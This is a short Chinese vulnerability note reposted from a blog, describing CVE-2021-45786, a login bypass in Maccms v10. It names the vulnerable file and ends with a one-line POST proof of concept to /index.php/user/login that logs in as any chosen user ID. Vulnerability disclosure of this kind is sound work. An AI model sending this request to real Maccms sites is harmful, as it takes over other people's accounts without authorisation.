其他分享
首页 > 其他分享> > CVE-2021-45786:maccms任意用户登录

CVE-2021-45786:maccms任意用户登录

作者:互联网

简介

在Maccms v10中,攻击者可以通过向/index.php/user/login发送“col”和“openid”参数实现越权登陆。

受影响版本

名称 版本 语言 更新
Maccms 10.0 PHP *

漏洞分析

\application\common\model\user.php中的320行“col”和“openid”参数客户端可控。(可实现登录任意id用户)

漏洞复现

POC


POST /index.php/user/login

col=user_id&openid=2

标签:openid,maccms,45786,index,id,user,php,col,2021
来源: https://www.cnblogs.com/hxlinux/p/16460003.html